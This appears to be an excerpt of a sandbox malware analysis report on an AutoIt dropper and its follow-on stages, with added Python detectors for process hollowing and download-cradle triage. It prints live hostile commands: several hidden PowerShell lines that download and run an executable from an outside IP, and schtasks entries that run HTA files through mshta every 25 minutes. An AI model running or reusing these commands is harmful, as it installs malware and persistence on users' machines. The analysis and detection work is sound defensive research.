Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Code function: 11_2_04BD03B4 rdtsc | 11_2_04BD03B4
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C8EAA2 BlockInput | 0_2_00C8EAA2
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00C42622
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_00C142DE
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C34CE8 mov eax, dword ptr fs:[00000030h]0_2_00C34CE8
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BE6092 mov eax, dword ptr fs:[00000030h]20_2_00BE6092
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDDC00 mov eax, dword ptr fs:[00000030h]20_2_00BDDC00
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CE6092 mov eax, dword ptr fs:[00000030h]21_2_00CE6092
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CDDC00 mov eax, dword ptr fs:[00000030h]21_2_00CDDC00
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C70B62
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C42622
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C3083F
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C309D5 SetUnhandledExceptionFilter,0_2_00C309D5
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C30C21
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDA245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00BDA245
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDA3A8 SetUnhandledExceptionFilter,20_2_00BDA3A8
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDEC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00BDEC0D
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BD995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00BD995A
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CDA245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00CDA245
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CD995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00CD995A
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CDEC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00CDEC0D
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeMemory protected: page guard

                                                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi32_8132.amsi.csv, type: OTHER
Source: Yara match | File source: amsi64_7096.amsi.csv, type: OTHER
Source: Yara match | File source: amsi32_7196.amsi.csv, type: OTHER
Source: Yara match | File source: amsi64_3572.amsi.csv, type: OTHER
Source: Yara match | File source: amsi32_7836.amsi.csv, type: OTHER
Source: Yara match | File source: amsi32_6060.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: mshta.exe PID: 8020, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mshta.exe PID: 6172, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ILqcVeT.exe PID: 4156, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rXOl0pp.exe PID: 8104, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mshta.exe PID: 6608, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7196, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mshta.exe PID: 7572, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3572, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mshta.exe PID: 6124, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mshta.exe PID: 5212, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mshta.exe PID: 5784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6060, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: 20_2_00BB8070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,20_2_00BB8070
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 299B008
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41D000
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42A000
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42C000
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 42D000
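The lines above describe process hollowing: 7dbaa342f5.exe allocates an execute/read/write region at the 0x400000 image base of a legitimate Windows binary (BitLockerToGo.exe) and then writes a buffer starting with 4D5A (an MZ header) to it, while nhDLtPT.exe carries the textbook call chain CreateProcessA, GetThreadContext, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread. The Python below is an added example, not Joe Sandbox's detection logic and not code from the sample: it matches that chain as an ordered subsequence against the report's own "Code function" lines. The signature steps and the alternative API spellings per step are this example's assumptions; the three sample lines are copied from this report.

```python
"""Ordered-subsequence matching of a process-hollowing API signature against
the 'Code function' lines of this report.  Added example: not Joe Sandbox's
detection logic and not code from the sample.  The signature and the
alternative API names per step are assumptions; the sample lines are copied
from the report."""
import re

# Hollowing = spawn a victim, read its thread context, allocate and write a
# new image into it, re-point the thread and resume it.  Each step lists the
# spellings a packer might use so the match survives Ex/Nt/Wow64 variants
# (assumed alternatives, not observed in this report).
HOLLOWING_SIGNATURE = [
    {"CreateProcessA", "CreateProcessW", "CreateProcess"},
    {"GetThreadContext", "Wow64GetThreadContext"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    {"ResumeThread", "NtResumeThread"},
]

# Constructed input: three 'Code function' lines copied from the report,
# keyed by the process and function id they belong to.
SAMPLE_LINES = {
    "nhDLtPT.exe 20_2_00BB8070": (
        "Code function: 20_2_00BB8070 GetModuleFileNameA,CreateProcessA,"
        "VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,"
        "WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,"
        "VirtualFree,20_2_00BB8070"),
    "aV2ffcSuKl.exe 0_2_00C71201": (
        "Code function: 0_2_00C71201 LogonUserW,DuplicateTokenEx,CloseHandle,"
        "OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,"
        "OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,"
        "CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,"
        "CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,"
        "DestroyEnvironmentBlock,0_2_00C71201"),
    "aV2ffcSuKl.exe 0_2_00C30C21": (
        "Code function: 0_2_00C30C21 SetUnhandledExceptionFilter,"
        "UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,"
        "0_2_00C30C21"),
}

FUNCTION_ID = re.compile(r"\d+_\d+_[0-9A-Fa-f]+")


def parse_calls(line):
    """Return the API names of a 'Code function:' line in call order,
    dropping the function id Joe Sandbox prints before and after the list."""
    m = re.search(r"Code function:\s*(.*)$", line)
    if not m:
        return []
    tokens = re.split(r"[\s,]+", m.group(1).strip())
    return [t for t in tokens if t and not FUNCTION_ID.fullmatch(t)]


def match_sequence(calls, signature):
    """Greedy ordered-subsequence match.  Every signature step must be
    satisfied by a call that comes after the call used for the previous
    step.  Returns the matched API names, or None when a step is missing."""
    pos, matched = 0, []
    for step in signature:
        while pos < len(calls) and calls[pos] not in step:
            pos += 1
        if pos == len(calls):
            return None
        matched.append(calls[pos])
        pos += 1
    return matched


def scan(lines, signature=HOLLOWING_SIGNATURE):
    """Map each label to the matched call chain for the lines that hit."""
    hits = {}
    for label, line in lines.items():
        chain = match_sequence(parse_calls(line), signature)
        if chain is not None:
            hits[label] = chain
    return hits


if __name__ == "__main__":
    for label, chain in scan(SAMPLE_LINES).items():
        print(label, "->", " > ".join(chain))
```

Only the nhDLtPT.exe function matches; the CreateProcessAsUserW chain in aV2ffcSuKl.exe (an AutoIt RunAs-style routine) and the CRT exception-filter sequence do not, because they lack the context read/write and resume steps. Order matters more than the individual APIs here: WriteProcessMemory on its own is common in legitimate software, the combination of a fresh process, a rewritten thread context and a resume is not.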
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C71201
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C52BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C52BA5
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C7B226 SendInput,keybd_event,0_2_00C7B226
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00C922DA
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE"
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe "C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe "C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe "C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd" "
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe "C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Process created: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe "C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "U6NDLmaxnYP" /tr "mshta \"C:\Temp\plDCQRtK9.hta\"" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\plDCQRtK9.hta"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
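The process-creation lines above form one loop: cmd.exe registers a scheduled task that runs an HTA through mshta every 25 minutes, the HTA spawns a hidden PowerShell that downloads http://176.113.115.7/mine/random.exe with System.Net.WebClient.DownloadFile into $env:temp and starts it, and that payload (rapes.exe, Amadey) fetches the next stages. Note the concatenation in most cradles: `$env:temp+'NAME'` has no path separator, so the file lands beside the Temp directory as `...\Local\TempNAME.EXE`, which is exactly the path the report records for P9Z71... and UBI6...; only the `'\483d2fa8a0d5...exe'` variant writes inside Temp. The Python below is an added triage helper, not Joe Sandbox's code and not code from the sample: it extracts the download URL, the real drop path, the task action and the interval from these command lines. The $env:temp value is an assumption; the command lines are copied from the report.

```python
"""Triage of the process-creation command lines above.  Added example: not
Joe Sandbox's code and not code from the sample.  It pulls the download URL
and drop path out of the mshta -> powershell cradle and the action and
interval out of the schtasks persistence commands.  The %TEMP% value is an
assumption; the command lines are copied from the report."""
import re
from dataclasses import dataclass, field

ASSUMED_TEMP = r"C:\Users\user\AppData\Local\Temp"   # assumed value of $env:temp

# Constructed input: command lines copied from the report above.
SAMPLE_CMDLINES = [
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
    r'''schtasks /create /tn "U6NDLmaxnYP" /tr "mshta \"C:\Temp\plDCQRtK9.hta\"" /sc minute /mo 25 /ru "user" /f''',
    r'''timeout /t 2''',
]

# $d=$env:temp+'NAME';(New-Object System.Net.WebClient).DownloadFile('URL',$d);Start-Process $d
CRADLE_RE = re.compile(
    r"\$d=\$env:temp\+'(?P<name>[^']+)'.*?"
    r"DownloadFile\('(?P<url>[^']+)',\$d\).*?Start-Process \$d",
    re.IGNORECASE | re.DOTALL)

# schtasks /create /tn NAME /tr "ACTION" /sc minute /mo N ...  The /tr value
# may contain \"-escaped quotes, as in the C:\Temp\plDCQRtK9.hta task.
SCHTASKS_RE = re.compile(
    r'schtasks\s+/create\b.*?/tn\s+"?(?P<tn>[^"\s]+)"?.*?'
    r'/tr\s+"(?P<tr>(?:[^"\\]|\\.)*)".*?/sc\s+(?P<sc>\w+)'
    r'(?:\s+/mo\s+(?P<mo>\d+))?',
    re.IGNORECASE)


@dataclass
class Finding:
    kind: str
    detail: dict = field(default_factory=dict)


def cradle_drop_path(name, temp=ASSUMED_TEMP):
    """Reproduce what $env:temp+'NAME' evaluates to.  $env:temp carries no
    trailing backslash, so a NAME without a leading backslash is glued onto
    the directory name and the file lands next to Temp, not inside it."""
    return temp + name


def classify(cmdline):
    """Return a Finding for a download cradle or a schtasks persistence
    command, or None for anything else."""
    m = CRADLE_RE.search(cmdline)
    if m:
        return Finding("download_and_execute", {
            "url": m["url"],
            "drop_path": cradle_drop_path(m["name"]),
            "path_inside_temp": m["name"].startswith("\\"),
            "hidden_window": "-windowstyle hidden" in cmdline.lower(),
        })
    m = SCHTASKS_RE.search(cmdline)
    if m:
        action = m["tr"].replace('\\"', '"')   # undo the cmd-level escaping
        return Finding("scheduled_task_persistence", {
            "task": m["tn"],
            "action": action,
            "lolbin": action.split()[0].lower(),
            "payload_is_hta": action.rstrip('"').lower().endswith(".hta"),
            "every_minutes": int(m["mo"]) if m["sc"].lower() == "minute" and m["mo"] else None,
        })
    return None


def triage(cmdlines):
    """Classify each command line; lines that match nothing are dropped."""
    return [f for f in map(classify, cmdlines) if f is not None]


if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f.kind, f.detail)
```

For incident response the two values that matter are `drop_path` (where to look on disk, which is outside Temp for most of the names in this report) and `every_minutes`, since the task re-downloads `random.exe` on each run and the C2 can rotate what that URL serves; deleting the dropped binaries without removing the schtasks entries and the .hta files leaves the loop intact.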
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C70B62
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C71663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C71663
Source: aV2ffcSuKl.exe, 00000000.00000000.1292608994.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp, 132fd7f0ed.exe, 0000001E.00000000.2085502700.0000000000382000.00000002.00000001.01000000.00000019.sdmp, 132fd7f0ed.exe, 0000003D.00000000.2228800526.0000000000382000.00000002.00000001.01000000.00000019.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: aV2ffcSuKl.exe | Binary or memory string: Shell_TrayWnd
Source: ILqcVeT.exe, 00000017.00000002.2388746724.00000000013AB000.00000040.00000001.01000000.00000013.sdmp | Binary or memory string: TProgram Manager
Source: vertualiziren.exe, 00000018.00000002.2029919575.000000000058F000.00000040.00000001.01000000.00000014.sdmp | Binary or memory string: z}Program Manager
Source: rapes.exe, TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Binary or memory string: FProgram Manager
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE, 0000000B.00000002.1410046761.0000000000819000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000C.00000002.1440658928.00000000004A9000.00000040.00000001.01000000.0000000F.sdmp, rapes.exe, 0000000D.00000002.1443703711.00000000004A9000.00000040.00000001.01000000.0000000F.sdmp | Binary or memory string: FProgram Manager
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C30698 cpuid 0_2_00C30698
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: EnumSystemLocalesW,20_2_00BF21B3
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: EnumSystemLocalesW,20_2_00BF2168
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00BF22D9
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: EnumSystemLocalesW,20_2_00BE825C
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: EnumSystemLocalesW,20_2_00BF224E
